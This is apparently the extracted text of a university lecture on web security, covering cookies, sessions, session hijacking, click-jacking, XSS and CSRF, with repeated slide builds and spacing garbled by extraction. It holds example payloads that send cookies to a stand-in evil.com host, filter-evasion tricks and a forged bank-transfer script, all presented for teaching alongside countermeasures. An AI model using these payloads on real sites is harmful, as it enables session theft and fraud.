Only hosts within a domain can set a cookie for that domain.,A subdomain can set a cookie for a domain at most one levelup.A subdomain can access a cookie for the top-level domain.A host cannot set cookies for the TLDs.
Dynamic Content 28/74
![Page 60: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/60.jpg)
Cookie Domains
![Page 65: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/65.jpg)
Cookie Transport
Cookies, by default, are sent using HTTP.
MITM attacks!
Countermeasures:1 Set the secure flag: HTTPS is used instead.2 Encrypt the cookie value.3 Obfuscate the cookie name.
Dynamic Content 30/74
![Page 66: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/66.jpg)
Server-Side Sessions
User information is kept in a database on the server.
A session ID ( session token ) identifies the user’s session.
GET/POST variables or cookies are used to store the token onthe client.
When the user browses to a page, the token is sent to theserver, and the user’s data is looked up from the database.
✞ ☎
<HTML><BODY><FORM ACTION=” ht tp ://www. v i c t o r i a s s e c r e t . com/buy . j s p ”
METHOD=” get ”><INPUT TYPE=” h idden ” NAME=” s e s s i o n ID ” VALUE=”0x324A . . . ”></FORM></BODY></HTML>✝ ✆
Dynamic Content 31/74
![Page 67: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/67.jpg)
Server-Side Sessions
sessionID data
0x878. . . name="Alice",height="170cm",..
0x9A5. . . name="Bob",height="180cm",...
![Page 68: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/68.jpg)
Server-Side Sessions
sessionID data
0x878. . . name="Alice",height="170cm",..
0x9A5. . . name="Bob",height="180cm",...
sessionID=0x878...
The session ID should be hard to guess.
Dynamic Content 32/74
![Page 69: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/69.jpg)
Outline
1 Introduction2 HTTPS3 Dynamic Content
DOM TreeSessions and Cookies
4 Attacks on ClientsSession HijackingClick-JackingPrivacy AttacksXSSCSRF
5 Attacks on ServersPHPFile InclusionSQL Injection Attacks
6 SummaryAttacks on Clients 33/74
![Page 70: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/70.jpg)
Session Hijacking
TCP session hijacking can be used to take over an HTTPsession.
Attacks on Clients 34/74
![Page 71: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/71.jpg)
Session Hijacking
TCP session hijacking can be used to take over an HTTPsession.
The attacker needs to impersonate the session mechanism(cookies,POST/GET,session ID).
Attacks on Clients 34/74
![Page 72: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/72.jpg)
Session Hijacking
TCP session hijacking can be used to take over an HTTPsession.
The attacker needs to impersonate the session mechanism(cookies,POST/GET,session ID).
Packet sniffers can be used to discover session IDs/cookies.
Attacks on Clients 34/74
![Page 73: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/73.jpg)
Session Hijacking
TCP session hijacking can be used to take over an HTTPsession.
The attacker needs to impersonate the session mechanism(cookies,POST/GET,session ID).
Packet sniffers can be used to discover session IDs/cookies.
Replay attacks : an attacker uses an old (previously valid)token to attempt an HTTP session hijacking attack.
Attacks on Clients 34/74
![Page 74: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/74.jpg)
Session Hijacking
Alice
sessionID data
0x878. . . name="Alice"
height="170cm"
0x9A5. . . name="Bob"
height="180cm"
![Page 75: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/75.jpg)
Session Hijacking
Alice
sessionID data
0x878. . . name="Alice"
height="170cm"
0x9A5. . . name="Bob"
height="180cm"
sessionID=0x878...
![Page 76: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/76.jpg)
Session Hijacking
Alice
sessionID data
0x878. . . name="Alice"
height="170cm"
0x9A5. . . name="Bob"
height="180cm"
Eve
sessionID=0x878...
sessionID=0x878...
Attacks on Clients 35/74
![Page 77: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/77.jpg)
Session Hijacking — Countermeasures
1 Client-side session tokens need to be encrypted.
Attacks on Clients 36/74
![Page 78: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/78.jpg)
Session Hijacking — Countermeasures
1 Client-side session tokens need to be encrypted.
2 Server-side session IDs need to be random.
Attacks on Clients 36/74
![Page 79: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/79.jpg)
Session Hijacking — Countermeasures
1 Client-side session tokens need to be encrypted.
2 Server-side session IDs need to be random.
3 To protect against replay attacks:
Attacks on Clients 36/74
![Page 80: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/80.jpg)
Session Hijacking — Countermeasures
1 Client-side session tokens need to be encrypted.
2 Server-side session IDs need to be random.
3 To protect against replay attacks:
1 add random numbers to client-side/server-side tokens,
Attacks on Clients 36/74
![Page 81: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/81.jpg)
Session Hijacking — Countermeasures
1 Client-side session tokens need to be encrypted.
2 Server-side session IDs need to be random.
3 To protect against replay attacks:
1 add random numbers to client-side/server-side tokens,2 change session tokens frequently.
Attacks on Clients 36/74
![Page 82: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/82.jpg)
Click-Jacking
Clicking on a link takes you to the wrong site:✞ ☎
<a onMouseUp=window . open ( ” h t tp ://www. e v i l . com” )h r e f=” h t tp ://www. t r u s t e d . com”>Trust Me!</a>
✝ ✆
Click-fraud : Increasing the click-throughs to increaseadvertising revenue.
Attacks on Clients 37/74
![Page 83: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/83.jpg)
Privacy Attacks — Third-party cookies
1 You browse to http://www.example1.com:✞ ☎
<HTML><BODY><img s r c=” ht tp :// ads . e v i l . com”>
</BODY></HTML>✝ ✆
2 ads.evil.com is sets a third-party cookie on your machine!
3 You browse to http://www.example2.com:✞ ☎
<HTML><BODY><img s r c=” ht tp :// ads . e v i l . com”>
</BODY></HTML>✝ ✆
4 ads.evil.com sets a third-party cookie on your machine!
5 You browse to http://www.ads.evil.com, it reads your cookies, andgets your browsing history!
Attacks on Clients 38/74
![Page 84: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/84.jpg)
Cross-Site Scripting (XSS)
Idea:1 attacker injects code C into a web site,
Attacks on Clients 39/74
![Page 85: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/85.jpg)
Cross-Site Scripting (XSS)
Idea:1 attacker injects code C into a web site,2 C makes its way into generated web page P ,
Attacks on Clients 39/74
![Page 86: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/86.jpg)
Cross-Site Scripting (XSS)
Idea:1 attacker injects code C into a web site,2 C makes its way into generated web page P ,3 a user is served the P page,
Attacks on Clients 39/74
![Page 87: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/87.jpg)
Cross-Site Scripting (XSS)
Idea:1 attacker injects code C into a web site,2 C makes its way into generated web page P ,3 a user is served the P page,4 the injected code C is executed on the user’s site.
Attacks on Clients 39/74
![Page 88: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/88.jpg)
Cross-Site Scripting (XSS)
Idea:1 attacker injects code C into a web site,2 C makes its way into generated web page P ,3 a user is served the P page,4 the injected code C is executed on the user’s site.
Attacks on Clients 39/74
![Page 89: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/89.jpg)
Cross-Site Scripting (XSS)
Idea:1 attacker injects code C into a web site,2 C makes its way into generated web page P ,3 a user is served the P page,4 the injected code C is executed on the user’s site.
Why does this work? The web programmer forgets to check( sanitize) input values!
Attacks on Clients 39/74
![Page 90: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/90.jpg)
Cross-Site Scripting. . .
Bob’s server sends Alice this form:✞ ☎
<HTML><TITLE>S ign My Guestbook !</TITLE>
<BODY><FORM ACTION=” s i g n . php” METHOD=”POST”>
<INPUT TYPE=” t e x t ” NAME=”name”><INPUT TYPE=” t e x t ” NAME=”message ” s i z e=”40”><INPUT TYPE=” submit ” VALUE=”Submit”>
</FORM></BODY></HTML>✝ ✆
Attacks on Clients 40/74
![Page 91: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/91.jpg)
Cross-Site Scripting. . .
Alice adds the text "I loved your new site!", andreturns it to Bob’s site.
In return, Bob sends her a new page:✞ ☎
<HTML><TITLE>S ign My Guestbook !</TITLE>
<BODY>Thanks eve rybody f o r your i n p u t !<br>Eve : I s a t beh ind you i n 7 th grade ! C a l l me! < br>Joe : Yo , f r a t−bro , l e t ’ s grab some b r ewsk i e s ! < br>A l i c e : I l o v ed your new s i t e !<br>
</BODY></HTML>✝ ✆
Attacks on Clients 41/74
![Page 92: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/92.jpg)
Cross-Site Scripting. . .
What if Eve had instead added the text✞ ☎
<s c r i p t >a l e r t ( ” A l i c e su ck s ! ” )>;/ s c r i p t >✝ ✆
as her comment?
Then Alice would be executing this page:✞ ☎
<HTML><TITLE>S ign My Guestbook !</TITLE>
<BODY>Thanks eve rybody f o r your i n p u t !<br>Eve : < s c r i p t >a l e r t ( ” A l i c e su ck s ! ” )>;/ s c r i p t > <br>Joe : Yo , f r a t−bro , l e t ’ s grab some b r ewsk i e s ! < br>A l i c e : I l o v ed your new s i t e !
</BODY></HTML>✝ ✆
Attacks on Clients 42/74
![Page 93: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/93.jpg)
Cross-Site Scripting. . .
Obviously, Eve could insert more harmful code:✞ ☎
<s c r i p t >document . l o c a t i o n =
” h t tp ://www. e v i l . com/ s t e a l . php? cook i e=”+document . c ook i e ;
</ s c r i p t >✝ ✆
This redirects the browser to the evil site, and passes alongAlice’s cookies.
Alice would notice that she’s being redirected to a weird site!
Attacks on Clients 43/74
![Page 94: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/94.jpg)
Cross-Site Scripting. . .
Eve could be more cunning:✞ ☎
<s c r i p t >img = new Image ( ) ;img . s r c=” h t tp ://www. e v i l . com/ s t e a l . php? cook i e=”+
document . c ook i e ;</ s c r i p t >✝ ✆
The browser tries to load an image from the evil site, passingalong the cookie.
No image is displayed — Alice doesn’t get suspicious!
Attacks on Clients 44/74
![Page 95: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/95.jpg)
Cross-Site Scripting. . .
An iframe is used to create a web page within a web page:✞ ☎
< i f r ame f rameborde r =0 s r c=”” h e i gh t=0width=0 i d=”XSS” name=”XSS”>
</i f r ame><s c r i p t >
f rames [ ”XSS” ] . l o c a t i o n . h r e f =” h t tp ://www. e v i l . com/ s t e a l . php? cook i e=”+document . c ook i e ;
</ s c r i p t >✝ ✆
This creates an invisible iframe, adding it to the DOM.
The script changes the source of the iframe to the evil site.
Attacks on Clients 45/74
![Page 96: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/96.jpg)
Cross-Site Scripting — Nonpersistent
So far, we’ve seen persistent XSS attacks:
the code Eve injects gets added to the server’s database;the code is displayed on the web page.
Non-persistent XSS attack: the injected code only persistsover the attacker’s session.
Example:1 attacker searches for "sneezing panda",2 web site responds with
"search results for ’sneezing panda’=..."
Attacks on Clients 46/74
![Page 97: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/97.jpg)
Cross-Site Scripting — Nonpersistent. . .
Assume a search page where the query is passed as a GETparameter:✞ ☎
h t tp : // v i c t im . com/ s e a r c h . php? query=s e a r c h s t r i n g✝ ✆
The attacker constructs this URL:✞ ☎
h t tp : // v i c t im . com/ s e a r c h . php? query=<s c r i p t >
document . l o c a t i o n=” h t tp :// e v i l . vom/ s t e a l . php? cook i e=”+document . c ook i e
</ s c r i p t >✝ ✆
When the victim navigates to the URL, the payload will beexecuted in their browser.
Attacks on Clients 47/74
![Page 98: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/98.jpg)
Cross-Site Scripting — Countermeasures
Programmers must sanitize all inputs:
Strip out all <script> tags!
Users can disable client-side scripts.
Firefox NoScript XSS detection sanitizes GET/POST variables:
remove quotes, double quotes, brackets.
Attacks on Clients 48/74
![Page 99: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/99.jpg)
Cross-Site Scripting — Counter-Countermeasures
Evade filtering by obfuscating GET requests usingURL encoding .
This request✞ ☎
<s c r i p t>a l e r t ( ’ h e l l o ’ );</ s c r i p t>✝ ✆
turns into✞ ☎
%3Cs c r i p t%3E a l e r t%28%27 h e l l o%27%29%3B%3C%2F s c r i p t%3E✝ ✆
Attacks on Clients 49/74
![Page 100: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/100.jpg)
Cross-Site Scripting — Counter-Countermeasures. . .
Obfuscate the script to avoid detection:✞ ☎
<s c r i p t >a = document . c ook i e ;b = ” tp ” ;c = ” ht ” ;d = ” :// ” ;e = ”ww” ;f = ”w. ” ;g = ” v i c ” ;h = ” t im” ;i = ” . c” ;j = ”om/ s e a r c h . p” ;k = ”hp?q=” ;document . l o c a t i o n=b+c+d+e+f+g+h+i+j+k+a ;
</ s c r i p t >✝ ✆
Attacks on Clients 50/74
![Page 101: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/101.jpg)
Cross-Site Request Forgery (CSRF)
Basic idea:1 Alice has an account with www.bob.com.
Attacks on Clients 51/74
![Page 102: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/102.jpg)
Cross-Site Request Forgery (CSRF)
Basic idea:1 Alice has an account with www.bob.com.2 www.bob.com trusts Alice.
Attacks on Clients 51/74
![Page 103: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/103.jpg)
Cross-Site Request Forgery (CSRF)
Basic idea:1 Alice has an account with www.bob.com.2 www.bob.com trusts Alice.3 Alice is authenticated with www.bob.com (through an active
cookie, for example).
Attacks on Clients 51/74
![Page 104: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/104.jpg)
Cross-Site Request Forgery (CSRF)
Basic idea:1 Alice has an account with www.bob.com.2 www.bob.com trusts Alice.3 Alice is authenticated with www.bob.com (through an active
cookie, for example).4 Alice vists a site www.evil.com.
Attacks on Clients 51/74
![Page 105: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/105.jpg)
Cross-Site Request Forgery (CSRF)
Basic idea:1 Alice has an account with www.bob.com.2 www.bob.com trusts Alice.3 Alice is authenticated with www.bob.com (through an active
cookie, for example).4 Alice vists a site www.evil.com.5 www.evil.com executes a malicious script on www.bob.com
(who thinks he’s talking to Alice!).
Attacks on Clients 51/74
![Page 106: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/106.jpg)
Cross-Site Request Forgery (CSRF)
Basic idea:1 Alice has an account with www.bob.com.2 www.bob.com trusts Alice.3 Alice is authenticated with www.bob.com (through an active
cookie, for example).4 Alice vists a site www.evil.com.5 www.evil.com executes a malicious script on www.bob.com
(who thinks he’s talking to Alice!).
Attacks on Clients 51/74
![Page 107: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/107.jpg)
Cross-Site Request Forgery (CSRF)
Basic idea:1 Alice has an account with www.bob.com.2 www.bob.com trusts Alice.3 Alice is authenticated with www.bob.com (through an active
cookie, for example).4 Alice vists a site www.evil.com.5 www.evil.com executes a malicious script on www.bob.com
(who thinks he’s talking to Alice!).
I.e. in a CSRF attack a website executes commands itreceived from a user it trusts.
Attacks on Clients 51/74
![Page 108: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/108.jpg)
Cross-Site Request Forgery (CSRF). . .
Alice is logged into her bank www.bank.com, her authenticationstored in a cookie.
She visits www.evil.com that has this script:✞ ☎
<s c r i p t >document . l o c a t i o n=” h t tp :// bank . com/ t r a n s f e r . php?
amount=1000&from=A l i c e&to=Eve” ;
</ s c r i p t >✝ ✆
Alice’ browser redirects to her bank which executes thetransfer.
Attacks on Clients 52/74
![Page 109: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/109.jpg)
Cross-Site Request Forgery — Login Attack
A malicious website issues cross-site requests on behalf of theuser, but makes the user authenticate as the attacker.
Example:1 Alice orders cookies from evescookies.com.
Attacks on Clients 53/74
![Page 110: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/110.jpg)
Cross-Site Request Forgery — Login Attack
A malicious website issues cross-site requests on behalf of theuser, but makes the user authenticate as the attacker.
Example:1 Alice orders cookies from evescookies.com.2 Alice logs into paypal.com to pay for the cookies.
Attacks on Clients 53/74
![Page 111: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/111.jpg)
Cross-Site Request Forgery — Login Attack
A malicious website issues cross-site requests on behalf of theuser, but makes the user authenticate as the attacker.
Example:1 Alice orders cookies from evescookies.com.2 Alice logs into paypal.com to pay for the cookies.3 But, Eve has injected code that makes Alice authenticate to
PayPal as Eve.
Attacks on Clients 53/74
![Page 112: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/112.jpg)
Cross-Site Request Forgery — Login Attack
A malicious website issues cross-site requests on behalf of theuser, but makes the user authenticate as the attacker.
Example:1 Alice orders cookies from evescookies.com.2 Alice logs into paypal.com to pay for the cookies.3 But, Eve has injected code that makes Alice authenticate to
PayPal as Eve.4 Alice gives paypal.com her credit card number.
Attacks on Clients 53/74
![Page 113: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/113.jpg)
Cross-Site Request Forgery — Login Attack
A malicious website issues cross-site requests on behalf of theuser, but makes the user authenticate as the attacker.
Example:1 Alice orders cookies from evescookies.com.2 Alice logs into paypal.com to pay for the cookies.3 But, Eve has injected code that makes Alice authenticate to
PayPal as Eve.4 Alice gives paypal.com her credit card number.5 Eve logs in to paypal.com to collect Alice’s credit card
number.
Attacks on Clients 53/74
![Page 114: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/114.jpg)
Cross-Site Request Forgery — Login Attack. . .
evescookies.com paypal.com
Alice
![Page 115: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/115.jpg)
Cross-Site Request Forgery — Login Attack. . .
evescookies.com paypal.com
Alice
buy
cookies!
![Page 116: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/116.jpg)
Cross-Site Request Forgery — Login Attack. . .
evescookies.com paypal.com
Alice
script:user=eve,pw=cookies
![Page 117: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/117.jpg)
Cross-Site Request Forgery — Login Attack. . .
evescookies.com paypal.com
Alice
payforcookies!
![Page 118: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/118.jpg)
Cross-Site Request Forgery — Login Attack. . .
evescookies.com paypal.com
Alice
login:user=eve,pw=cookies
![Page 119: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/119.jpg)
Cross-Site Request Forgery — Login Attack. . .
evescookies.com paypal.com
Alice
VISA=4750...
![Page 120: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/120.jpg)
Cross-Site Request Forgery — Login Attack. . .
evescookies.com paypal.com
Alice
login
![Page 121: CSc 466/566 Computer Security 20 : Web Securitycollberg/Teaching/466... · In 2006, researchers at Stanford University and Microsoft Research conducted a usability study of the EV](https://reader034.fdocuments.in/reader034/viewer/2022050523/5fa6d8c32f1da633d06221ba/html5/thumbnails/121.jpg)
Cross-Site Request Forgery — Login Attack. . .
evescookies.com paypal.com
Alice
VISA=4750...
Attacks on Clients 54/74
